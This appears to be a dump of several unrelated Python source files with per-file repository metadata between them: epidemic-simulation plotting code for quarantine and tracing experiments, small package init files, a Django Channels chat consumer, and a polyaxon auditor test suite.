                           mccount=mc_iterations, p=95)

        line_artists[i] = l1[0]
        line_artists[n_p_i + i] = l3[0]

    labels1 = list(['quar.: $p_i$=' + str(val) for val in p_is])
    labels2 = list(['trac.: $p_i$=' + str(val) for val in p_is])
    # line_labels = [None,]*2*n_p_i
    # line_labels[::2] = labels1
    # line_labels[1::2] = labels2
    line_labels = labels1 + labels2
    fig.legend(handles=line_artists,        # the line objects
               labels=line_labels,          # the labels for each line
               loc="center",                # position of legend
               bbox_to_anchor=(0.5, -0.1),
               borderaxespad=0.1,           # small spacing around legend box
               ncol=2)
    plt.subplots_adjust(bottom=0.01)

    # ax1.legend(['$p_i$=' + str(val) for val in p_is], loc='upper center', bbox_to_anchor=(0.5, -0.25), ncol=3)  # looks bad
    # ax2.legend(['$p_i$=' + str(val) for val in p_is], bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left', ncol=3, mode="expand")  # looks worse
    # ax3.legend(['$p_i$=' + str(val) for val in p_is], loc='upper center', bbox_to_anchor=(0.5, -0.25), fancybox=True, shadow=True, ncol=3)

    # # left upper axis for dispersion values
    # ax_upper_axis = axul.twiny()
    # ax_upper_axis.set_xlim(axul.get_xlim())
    # ax_upper_axis.set_xticks(Cs)
    # ax_upper_axis.set_xticklabels(["{:.2f}".format(a) for a in achieved_disps.mean(axis=0)])
    # ax_upper_axis.set_xlabel('D(g)')

    # # right upper axis for dispersion values
    # ax_upper_axis = axur.twiny()
    # ax_upper_axis.set_xlim(axul.get_xlim())
    # ax_upper_axis.set_xticks(Cs)
    # ax_upper_axis.set_xticklabels(["{:.2f}".format(a) for a in achieved_disps.mean(axis=0)])
    # ax_upper_axis.set_xlabel('D(g)')

    plt.tight_layout()

    parent = os.path.dirname(path)
    fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected'.format(
        n, str(interval[0]) + 'to' + str(interval[1])) + '.pdf'), bbox_inches='tight', pad_inches=0)

    return out


def vary_C_pi_comp_corrected_flipped(res, n, p, p_is: tuple, mc_iterations, max_t, interval=None, seed=0,
                                     force_recompute=False, path=None):
    # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome
    # Several values for the infectivity p_i are used

    Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res)
    n_p_i = len(p_is)
    # assert n_p_i <= 5, 'Fewer values for p_i should be selected for visibility'

    # the following two variables save the actual values that were achieved by the heuristic.
    # In theory, these should be approximately the same in each net
    achieved_clusterings = np.zeros((3 * n_p_i, res))
    achieved_disps = np.zeros((3 * n_p_i, res))

    # vanilla
    peak_times_1 = np.ndarray((res, n_p_i))
    peak_heights_1 = np.ndarray((res, n_p_i))
    peak_heights_sd_1 = np.ndarray((res, n_p_i))
    period_prevalences_1 = np.ndarray((res, n_p_i))
    period_prevalences_sd_1 = np.ndarray((res, n_p_i))
    for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'):
        for j, p_inf in enumerate(p_is):
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 156484 + seed + i, mode='vanilla',
                                  force_recompute=force_recompute, path=path, clustering=C)
            assert equilib_flag, 'Sim not complete?'
            peak_times_1[i, j] = t_peak
            peak_heights_1[i, j] = mean_peak
            peak_heights_sd_1[i, j] = sd_peak
            period_prevalences_1[i, j] = mean_prevalence
            period_prevalences_sd_1[i, j] = sd_prevalence

            achieved_clusterings[j, i] = achieved_clustering
            achieved_disps[j, i] = achieved_disp

    # quarantine
    peak_times_2 = np.ndarray((res, n_p_i))
    peak_heights_2 = np.ndarray((res, n_p_i))
    peak_heights_sd_2 = np.ndarray((res, n_p_i))
    period_prevalences_2 = np.ndarray((res, n_p_i))
    period_prevalences_sd_2 = np.ndarray((res, n_p_i))
    for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'):
        for j, p_inf in enumerate(p_is):
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 84265 + seed + i + res,
                                  mode='quarantine', force_recompute=force_recompute, path=path, clustering=C)
            assert equilib_flag, 'Sim not complete?'

            peak_times_2[i, j] = t_peak
            peak_heights_2[i, j] = mean_peak
            peak_heights_sd_2[i, j] = sd_peak
            period_prevalences_2[i, j] = mean_prevalence
            period_prevalences_sd_2[i, j] = sd_prevalence

            achieved_clusterings[n_p_i + j, i] = achieved_clustering
            achieved_disps[n_p_i + j, i] = achieved_disp

    # tracing
    peak_times_3 = np.ndarray((res, n_p_i))
    peak_heights_3 = np.ndarray((res, n_p_i))
    peak_heights_sd_3 = np.ndarray((res, n_p_i))
    period_prevalences_3 = np.ndarray((res, n_p_i))
    period_prevalences_sd_3 = np.ndarray((res, n_p_i))
    for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'):
        for j, p_inf in enumerate(p_is):
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 543513 + seed + i + 2 * res,
                                  mode='tracing', force_recompute=force_recompute, path=path, clustering=C)
            assert equilib_flag, 'Sim not complete?'

            peak_times_3[i, j] = t_peak
            peak_heights_3[i, j] = mean_peak
            peak_heights_sd_3[i, j] = sd_peak
            period_prevalences_3[i, j] = mean_prevalence
            period_prevalences_sd_3[i, j] = sd_prevalence

            achieved_clusterings[2 * n_p_i + j, i] = achieved_clustering
            achieved_disps[2 * n_p_i + j, i] = achieved_disp

    dirname_parent = os.path.dirname(__file__)
    dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache')

    id_params = (n, p, p_is, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t,
                 quarantine_time, resolution, epsilon_clustering)
    # normal hashes are salted between runs -> use something that is persistent
    tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest())

    with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f:
        out = [Cs, peak_times_1, peak_heights_1, period_prevalences_1,
               peak_times_2, peak_heights_2, period_prevalences_2,
               peak_times_3, peak_heights_3, period_prevalences_3,
               achieved_clusterings, achieved_disps]
        pickle.dump(out, f)

    # two modes for visualization
    scale = 1
    fig, axes = plt.subplots(4, 1, figsize=(columwidth, 2 * columwidth), dpi=1000)
    ax1, ax2, ax3, ax4 = axes  # reordered to be 4x1

    ax1.set_ylabel('peak ratio ($\\alpha$)')
    ax3.set_ylabel('peak ratio ($\\alpha$)')
    ax2.set_ylabel('overall ratio ($\\beta$)')
    ax4.set_ylabel('overall ratio ($\\beta$)')

    ax1.set_ylim([0, 1])
    ax2.set_ylim([0, 1])
    ax3.set_ylim([0, 1])
    ax4.set_ylim([0, 1])

    # ax1.set_ylabel('$p_i$')
    # ax2.set_ylabel('$p_i$')
    # ax3.set_ylabel('$p_i$')
    ax4.set_xlabel('$p_i$')

    # quick and dirty: only keep the values for every sixth C
    step = 6
    Cs = Cs[0::step]
    peak_heights_1 = peak_heights_1[0::step, :]
    peak_heights_2 = peak_heights_2[0::step, :]
    peak_heights_3 = peak_heights_3[0::step, :]
    peak_heights_sd_1 = peak_heights_sd_1[0::step, :]
    peak_heights_sd_2 = peak_heights_sd_2[0::step, :]
    peak_heights_sd_3 = peak_heights_sd_3[0::step, :]
    period_prevalences_1 = period_prevalences_1[0::step, :]
    period_prevalences_2 = period_prevalences_2[0::step, :]
    period_prevalences_3 = period_prevalences_3[0::step, :]
    period_prevalences_sd_1 = period_prevalences_sd_1[0::step, :]
    period_prevalences_sd_2 = period_prevalences_sd_2[0::step, :]
    period_prevalences_sd_3 = period_prevalences_sd_3[0::step, :]
    n_Cs = len(Cs)

    oranges = plt.get_cmap('Blues')  # note: despite the name, this uses the 'Blues' colormap
    greens = plt.get_cmap('Greens')
    n_colors = n_p_i
    col_vals = np.linspace(0.7, 1, n_Cs)
    colors = [oranges(col_val) for col_val in col_vals] + [greens(col_val) for col_val in col_vals]
    linestyles = ['-', '--', ':', '-.', (0, (5, 10))]
    line_artists = [None, ] * 2 * n_Cs
    for i in range(n_Cs):
        linestyle = linestyles[i % len(linestyles)]  # wrap around; plain linestyles[i] fails for n_Cs > 5
        l1 = ax1.plot(p_is, peak_heights_2[i, :] / peak_heights_1[i, :], color=colors[i], linestyle=linestyle,
                      zorder=1)
        estimateQuotientCI(ax1, p_is, peak_heights_2[i, :], peak_heights_sd_2[i, :], peak_heights_1[i, :],
                           peak_heights_sd_1[i, :], color=colors[i], mccount=mc_iterations, p=95)
        l3 = ax3.plot(p_is, peak_heights_3[i, :] / peak_heights_1[i, :], color=colors[n_Cs + i],
                      linestyle=linestyle, zorder=1)
        estimateQuotientCI(ax3, p_is, peak_heights_3[i, :], peak_heights_sd_3[i, :], peak_heights_1[i, :],
                           peak_heights_sd_1[i, :], color=colors[n_Cs + i], mccount=mc_iterations, p=95)
        l2 = ax2.plot(p_is, period_prevalences_2[i, :] / period_prevalences_1[i, :], color=colors[i],
                      linestyle=linestyle, zorder=1)
        estimateQuotientCI(ax2, p_is, period_prevalences_2[i, :], period_prevalences_sd_2[i, :],
                           period_prevalences_1[i, :], period_prevalences_sd_1[i, :], color=colors[i],
                           mccount=mc_iterations, p=95)
        l4 = ax4.plot(p_is, period_prevalences_3[i, :] / period_prevalences_1[i, :], color=colors[n_Cs + i],
                      linestyle=linestyle, zorder=1)
        estimateQuotientCI(ax4, p_is, period_prevalences_3[i, :], period_prevalences_sd_3[i, :],
                           period_prevalences_1[i, :], period_prevalences_sd_1[i, :], color=colors[n_Cs + i],
                           mccount=mc_iterations, p=95)

        line_artists[i] = l1[0]
        line_artists[n_Cs + i] = l3[0]

    labels1 = list(['quar.: $C(g)$={:.2f}'.format(val) for val in Cs])
    labels2 = list(['trac.: $C(g)$={:.2f}'.format(val) for val in Cs])
    line_labels = labels1 + labels2
    fig.legend(handles=line_artists,        # the line objects
               labels=line_labels,          # the labels for each line
               loc="center",                # position of legend
               bbox_to_anchor=(0.5, -0.1),
               borderaxespad=0.1,           # small spacing around legend box
               ncol=2)
    plt.subplots_adjust(bottom=0.01)

    plt.tight_layout()

    parent = os.path.dirname(path)
    fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected_flipped'.format(
        n, str(interval[0]) + 'to' + str(interval[1])) + '.pdf'), bbox_inches='tight', pad_inches=0)

    return out


def vary_C_comp_epcurves(res, n, p, p_i, mc_iterations, max_t, interval, seed=0, force_recompute=False,
                         path=None):
    # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome
    # the res parameter defines how many points on [0,1] are used

    Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res)

    # the following two variables save the actual values that were achieved by the heuristic.
    # In theory, these should be approximately the same in each net
    achieved_clusterings = np.zeros((3, res))
    achieved_disps = np.zeros((3, res))

    # set up the plots
    # fig, axes = plt.subplots(1, 4, figsize=(8*scale, 4*scale), gridspec_kw={'width_ratios': [5,5,5,0.3]}, dpi=1000)
    fig = plt.figure(figsize=(columwidth, columwidth))
    rows = 3
    columns = 2
    grid = fig.add_gridspec(rows, columns, wspace=.25, hspace=.35, width_ratios=[10, 0.4])

    # plt.subplot(grid[0, :])
    # plt.annotate('sub1', xy=(0.5, -0.5), va='center', ha='center', weight='bold', fontsize=15)
    # plt.plot(x, y)
    #
    # plt.subplot(grid[1, 0])
    # plt.annotate('sub2', xy=(0.5, -0.5), va='center', ha='center', weight='bold', fontsize=15)
    # plt.plot(x, y)
    #
    # plt.subplot(grid[1, 1])
    # plt.annotate('sub3', xy=(0.5, -0.5), va='center', ha='center', weight='bold', fontsize=15)
    # plt.plot(x, y)
    #
    # plt.subplot(grid[1, 2])
    # plt.annotate('sub4', xy=(0.5, -0.5), va='center', ha='center', weight='bold', fontsize=15)
    # plt.plot(x, y)
    # plt.show()

    ax1 = fig.add_subplot(grid[0, 0])
    ax2 = fig.add_subplot(grid[1, 0])
    ax3 = fig.add_subplot(grid[2, 0])
    cbar_ax = fig.add_subplot(grid[:, 1])
    # ax1, ax2, ax3, cbar_ax = axes

    ax1.set_ylabel('Infected')
    ax2.set_ylabel('Infected')
    ax3.set_ylabel('Infected')
    ax1.set_xlabel('t')
    ax2.set_xlabel('t')
    ax3.set_xlabel('t')

    # cbar_ax.axis('off')
    norm = matplotlib.colors.Normalize(vmin=Cs[0], vmax=Cs[-1], clip=False)
    cmap = plt.cm.jet
    cb1 = mpl.colorbar.ColorbarBase(cbar_ax, cmap=cmap, norm=norm, orientation='vertical')
    cbar_ax.set_ylabel('C(g)')

    # set up colorcycles
    # color = plt.cm.viridis(Cs)
    # norm = mpl.colors.Normalize(vmin=Cs[0], vmax=Cs[-1])
    # fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=color), ax=ax1)
    # fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=color), ax=ax2)
    # fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=color), ax=ax3)
    # color.cycle_cmap(res)
    # mpl.rcParams['axes.prop_cycle'] = cycler.cycler('color', color)
    # ax3.legend(list(['C = ' + str(C) for C in Cs]))

    # vanilla
    peak_times_1 = np.ndarray(res)
    peak_heights_1 = np.ndarray(res)
    period_prevalences_1 = np.ndarray(res)
    unsuccessful_flags_1 = []
    for i, C in tqdm(enumerate(Cs), desc='Vanilla', total=res):
        net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
            simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode='vanilla',
                              force_recompute=force_recompute, path=path, clustering=C)
        peak_times_1[i] = t_peak
        peak_heights_1[i] = mean_peak
        period_prevalences_1[i] = mean_prevalence

        achieved_clusterings[0, i] = achieved_clustering
        achieved_disps[0, i] = achieved_disp

        # epidemiological curve
        ax1.plot(mean_counts[2, :], color=cmap(norm(C)), linewidth=0.75)

    # quarantine
    peak_times_2 = np.ndarray(res)
    peak_heights_2 = np.ndarray(res)
    period_prevalences_2 = np.ndarray(res)
    unsuccessful_flags_2 = []
    for i, C in tqdm(enumerate(Cs), desc='Quarantine', total=res):
        net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
            simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode='quarantine',
                              force_recompute=force_recompute, path=path, clustering=C)
        peak_times_2[i] = t_peak
        peak_heights_2[i] = mean_peak / peak_heights_1[i]
        period_prevalences_2[i] = mean_prevalence / period_prevalences_1[i]

        achieved_clusterings[1, i] = achieved_clustering
        achieved_disps[1, i] = achieved_disp

        # epidemiological curve
        ax2.plot(mean_counts[2, :], color=cmap(norm(C)), linewidth=0.75)

    # tracing
    peak_times_3 = np.ndarray(res)
    peak_heights_3 = np.ndarray(res)
    period_prevalences_3 = np.ndarray(res)
    unsuccessful_flags_3 = []
    for i, C in tqdm(enumerate(Cs), desc='Tracing', total=res):
        net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
            simple_experiment(n, p, p_i, 2 * mc_iterations, max_t, seed=seed + i + 2 * res, mode='tracing',
                              force_recompute=force_recompute, path=path, clustering=C)
        peak_times_3[i] = t_peak
        peak_heights_3[i] = mean_peak / peak_heights_1[i]
        period_prevalences_3[i] = mean_prevalence / period_prevalences_1[i]

        achieved_clusterings[2, i] = achieved_clustering
        achieved_disps[2, i] = achieved_disp

        # epidemiological curve
        ax3.plot(mean_counts[2, :], color=cmap(norm(C)), linewidth=0.75)

    parent = os.path.dirname(path)
    dirname_parent = os.path.dirname(__file__)
    dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache')

    id_params = (n, p, p_i, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t,
                 quarantine_time, resolution, epsilon_clustering)
    # normal hashes are salted between runs -> use something that is persistent
    tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest())

    with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f:
        out = [Cs, unsuccessful_flags_1, peak_times_1, peak_heights_1, period_prevalences_1,
               Cs, unsuccessful_flags_2, peak_times_2, peak_heights_2, period_prevalences_2,
               Cs, unsuccessful_flags_3, peak_times_3, peak_heights_3, period_prevalences_3,
               achieved_clusterings, achieved_disps]
        pickle.dump(out, f)

    # plt.tight_layout()
    fig.align_ylabels()
    fig.savefig(os.path.join(dirname_parent, 'Experiments', 'Paper', 'Pics', 'Cvaried_n{}_C{}_comp_epcurves'.format(
        n, str(interval[0]) + 'to' + str(interval[1])) + '.pdf'), bbox_inches='tight')

    return out


if __name__ == '__main__':
    res = 20
    n = 500
    p = 0.1
    p_i = 0.5
    mc_iterations = 50
    max_t = 200

    path = r'C:\Users\giglerf\Google Drive\Seminar_Networks\Experiments\vary_params'

    vary_p(res=res, n=n, p_i=p_i, mc_iterations=mc_iterations, max_t=max_t, force_recompute=False, path=path)
    vary_p(res=res, n=n, p_i=p_i, mc_iterations=mc_iterations, max_t=max_t, mode='quarantine',
           force_recompute=False, path=path)
    vary_p(res=res, n=n, p_i=p_i, mc_iterations=mc_iterations, max_t=max_t, mode='tracing',
           force_recompute=False, path=path)

    vary_p_i(res=res, n=n, p=p, mc_iterations=mc_iterations, max_t=max_t, force_recompute=False, path=path)
    vary_p_i(res=res, n=n, p=p, mc_iterations=mc_iterations, max_t=max_t, mode='quarantine',
             force_recompute=False, path=path)
    vary_p_i(res=res, n=n, p=p, mc_iterations=mc_iterations, max_t=max_t, mode='tracing',
             force_recompute=False, path=path)

    # vary_p(res=3, n=100, p_i=0.5, mc_iterations=1, max_t=20,
    #        path=r'C:\Users\giglerf\Google Drive\Seminar_Networks\Experiments\vary_params')
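A note on the cache tag used throughout these experiment functions: Python's built-in hash() is randomized per interpreter run (PYTHONHASHSEED), which is what the recurring comment "normal hashes are salted between runs" refers to, so the code derives cache filenames from an md5 digest of the stringified parameter tuple instead. A minimal sketch of the idea (the function name is illustrative, not from the source file):

import hashlib

def cache_tag(id_params: tuple) -> str:
    # str(id_params) is stable across runs as long as each entry has a stable repr
    return hashlib.md5(str(id_params).encode('utf8')).hexdigest()

# the same parameters always map to the same cache file name, in every run
assert cache_tag((500, 0.1, 0.5)) == cache_tag((500, 0.1, 0.5))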
43.42245
153
0.630026
10,297
71,951
4.154414
0.059241
0.043714
0.029454
0.017579
0.88424
0.862032
0.845481
0.839964
0.830544
0.819183
0
0.024974
0.239246
71,951
1,656
154
43.448672
0.756545
0.326889
0
0.615925
0
0
0.052072
0.003947
0
0
0
0.000604
0.015222
1
0.012881
false
0
0.016393
0
0.037471
0.008197
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
74d177778420438ff2eca413f2fefcfb8e7d85fb
43
py
Python
modelexp/__init__.py
DomiDre/modelexp
1ec25f71e739dac27716f9a8637fa6ab067499b9
[ "MIT" ]
null
null
null
modelexp/__init__.py
DomiDre/modelexp
1ec25f71e739dac27716f9a8637fa6ab067499b9
[ "MIT" ]
null
null
null
modelexp/__init__.py
DomiDre/modelexp
1ec25f71e739dac27716f9a8637fa6ab067499b9
[ "MIT" ]
null
null
null
from ._app import App
from ._cli import Cli
21.5
21
0.790698
8
43
4
0.5
0
0
0
0
0
0
0
0
0
0
0
0.162791
43
2
22
21.5
0.888889
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
74ec24e9c8e87181d24709864b41d8c1ddcf4e40
37
py
Python
schicluster/impute/__init__.py
zhoujt1994/HiCluster
ee7431c33d8b565cd8b92b633e6f79b2267c1535
[ "MIT" ]
null
null
null
schicluster/impute/__init__.py
zhoujt1994/HiCluster
ee7431c33d8b565cd8b92b633e6f79b2267c1535
[ "MIT" ]
null
null
null
schicluster/impute/__init__.py
zhoujt1994/HiCluster
ee7431c33d8b565cd8b92b633e6f79b2267c1535
[ "MIT" ]
null
null
null
from .snakemake import prepare_impute
37
37
0.891892
5
37
6.4
1
0
0
0
0
0
0
0
0
0
0
0
0.081081
37
1
37
37
0.941176
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2d198a2f244324ff0128838b9a5ae9d9ce102ecd
143
py
Python
src/dicomweb_client/__init__.py
michaelloewenstein/dicomweb-client
0ea37db68a2b9c8373c964e610acea945b7b07b7
[ "MIT" ]
null
null
null
src/dicomweb_client/__init__.py
michaelloewenstein/dicomweb-client
0ea37db68a2b9c8373c964e610acea945b7b07b7
[ "MIT" ]
null
null
null
src/dicomweb_client/__init__.py
michaelloewenstein/dicomweb-client
0ea37db68a2b9c8373c964e610acea945b7b07b7
[ "MIT" ]
null
null
null
__version__ = '0.52.0'

from dicomweb_client.api import DICOMwebClient  # noqa
from dicomweb_client.uri import URI, URISuffix, URIType  # noqa
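A brief, hedged usage sketch for the API re-exported above (the server URL is a placeholder; DICOMwebClient and search_for_studies are part of dicomweb-client's documented public interface):

from dicomweb_client.api import DICOMwebClient

client = DICOMwebClient(url='https://example.com/dicomweb')  # placeholder URL
studies = client.search_for_studies()  # QIDO-RS study search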
28.6
63
0.783217
20
143
5.3
0.65
0.226415
0.339623
0
0
0
0
0
0
0
0
0.03252
0.13986
143
4
64
35.75
0.829268
0.062937
0
0
0
0
0.045802
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
740fe8cbb416d0ab36b1379f3546e419288814df
97
py
Python
__init__.py
joeliu1985/learnseldom
759c30bdd60bad8877f6f156536d7158d861cb95
[ "Apache-2.0" ]
359
2020-08-15T12:36:42.000Z
2022-03-31T03:07:06.000Z
__init__.py
liumengjia/UIAutoDemo
a7d7fecf37045357bdc2a98371edc5f8b15bc50a
[ "Apache-2.0" ]
6
2020-10-15T12:06:23.000Z
2021-07-01T03:28:55.000Z
__init__.py
liumengjia/UIAutoDemo
a7d7fecf37045357bdc2a98371edc5f8b15bc50a
[ "Apache-2.0" ]
63
2020-08-16T00:52:21.000Z
2022-03-15T13:35:22.000Z
""" 更新时间:2020-08-27 版本说明: 1、seldom:1.6.0 2、poium:0.6.3 3、Python:3.7.4 """
13.857143
22
0.463918
20
97
2.25
0.75
0
0
0
0
0
0
0
0
0
0
0.298507
0.309278
97
7
23
13.857143
0.373134
0.917526
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
7411749e416475591e8cc5ecaa9729e38a18a59a
360
py
Python
apps/chat/consumers.py
SeniorDev34/Django_React_Chat
5234fd14e65902e06a8bb14eae5e411798ddece9
[ "BSD-3-Clause" ]
58
2016-09-26T14:30:14.000Z
2022-02-15T21:38:32.000Z
apps/chat/consumers.py
Webdev889/Django_React_Chat
5234fd14e65902e06a8bb14eae5e411798ddece9
[ "BSD-3-Clause" ]
1
2020-06-05T20:31:09.000Z
2020-06-05T20:31:09.000Z
apps/chat/consumers.py
Webdev889/Django_React_Chat
5234fd14e65902e06a8bb14eae5e411798ddece9
[ "BSD-3-Clause" ]
15
2016-09-26T14:38:24.000Z
2020-03-30T12:00:06.000Z
from channels.sessions import channel_session

from .engine import ChatEngine


@channel_session
def ws_connect(message):
    # TODO Move many LOGIN_USER actions from ws_message into ws_add
    pass


@channel_session
def ws_message(message):
    ChatEngine.dispatch(message)


@channel_session
def ws_disconnect(message):
    ChatEngine(message).disconnect()
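For context, a sketch of how consumers like these were typically wired up in channels 1.x; the project's actual routing module is not shown here, so this wiring is an assumption:

from channels.routing import route

channel_routing = [
    route('websocket.connect', ws_connect),
    route('websocket.receive', ws_message),
    route('websocket.disconnect', ws_disconnect),
]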
18
67
0.788889
47
360
5.829787
0.489362
0.20438
0.186131
0.208029
0
0
0
0
0
0
0
0
0.147222
360
19
68
18.947368
0.892508
0.169444
0
0.272727
0
0
0
0
0
0
0
0.052632
0
1
0.272727
false
0.090909
0.181818
0
0.454545
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
0
1
0
0
0
0
0
6
7421110cf1ee2b53032b9a766c6c2971fc7e112a
4,657
py
Python
tests/test_auditor/test_auditor_notebook.py
elyase/polyaxon
1c19f059a010a6889e2b7ea340715b2bcfa382a0
[ "MIT" ]
null
null
null
tests/test_auditor/test_auditor_notebook.py
elyase/polyaxon
1c19f059a010a6889e2b7ea340715b2bcfa382a0
[ "MIT" ]
null
null
null
tests/test_auditor/test_auditor_notebook.py
elyase/polyaxon
1c19f059a010a6889e2b7ea340715b2bcfa382a0
[ "MIT" ]
null
null
null
# pylint:disable=ungrouped-imports
from unittest.mock import patch

import pytest

import activitylogs
import auditor
import tracker
from event_manager.events import notebook as notebook_events
from factories.factory_plugins import NotebookJobFactory
from factories.factory_projects import ProjectFactory
from tests.utils import BaseTest


@pytest.mark.auditor_mark
class AuditorNotebookTest(BaseTest):
    """Testing subscribed events"""
    DISABLE_RUNNER = True

    def setUp(self):
        self.notebook = NotebookJobFactory(project=ProjectFactory())
        auditor.validate()
        auditor.setup()
        tracker.validate()
        tracker.setup()
        activitylogs.validate()
        activitylogs.setup()
        super().setUp()

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_notebook_started(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_STARTED,
                       instance=self.notebook,
                       target='project')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 0

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_notebook_started_triggered(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_STARTED_TRIGGERED,
                       instance=self.notebook,
                       target='project',
                       actor_id=1,
                       actor_name='foo')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 1

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_notebook_stopped(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_STOPPED,
                       instance=self.notebook,
                       target='project')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 0

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_notebook_stopped_triggered(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_STOPPED_TRIGGERED,
                       instance=self.notebook,
                       target='project',
                       actor_id=1,
                       actor_name='foo')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 1

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_notebook_viewed(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_VIEWED,
                       instance=self.notebook,
                       target='project',
                       actor_id=1,
                       actor_name='foo')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 1

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_experiment_new_status(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_NEW_STATUS,
                       instance=self.notebook,
                       target='project')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 0

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_experiment_failed(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_FAILED,
                       instance=self.notebook,
                       target='project')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 0

    @patch('tracker.service.TrackerService.record_event')
    @patch('activitylogs.service.ActivityLogService.record_event')
    def test_experiment_succeeded(self, activitylogs_record, tracker_record):
        auditor.record(event_type=notebook_events.NOTEBOOK_SUCCEEDED,
                       instance=self.notebook,
                       target='project')

        assert tracker_record.call_count == 1
        assert activitylogs_record.call_count == 0
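One detail worth noting in the tests above: stacked @patch decorators are applied bottom-up, so the innermost patch supplies the first mock argument, which is why each test receives (activitylogs_record, tracker_record) in that order. A standalone sketch of the rule (not part of the suite above):

from unittest.mock import patch

@patch('os.path.exists')   # outermost decorator -> second mock argument
@patch('os.path.isfile')   # innermost decorator -> first mock argument
def check(isfile_mock, exists_mock):
    import os
    os.path.isfile('x')
    os.path.exists('y')
    assert isfile_mock.called and exists_mock.called

check()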
39.803419
83
0.683702
470
4,657
6.514894
0.140426
0.086218
0.07838
0.057479
0.801437
0.801437
0.801437
0.801437
0.801437
0.801437
0
0.005324
0.233627
4,657
116
84
40.146552
0.85262
0.012669
0
0.593407
0
0
0.17966
0.165505
0
0
0
0
0.175824
1
0.098901
false
0
0.098901
0
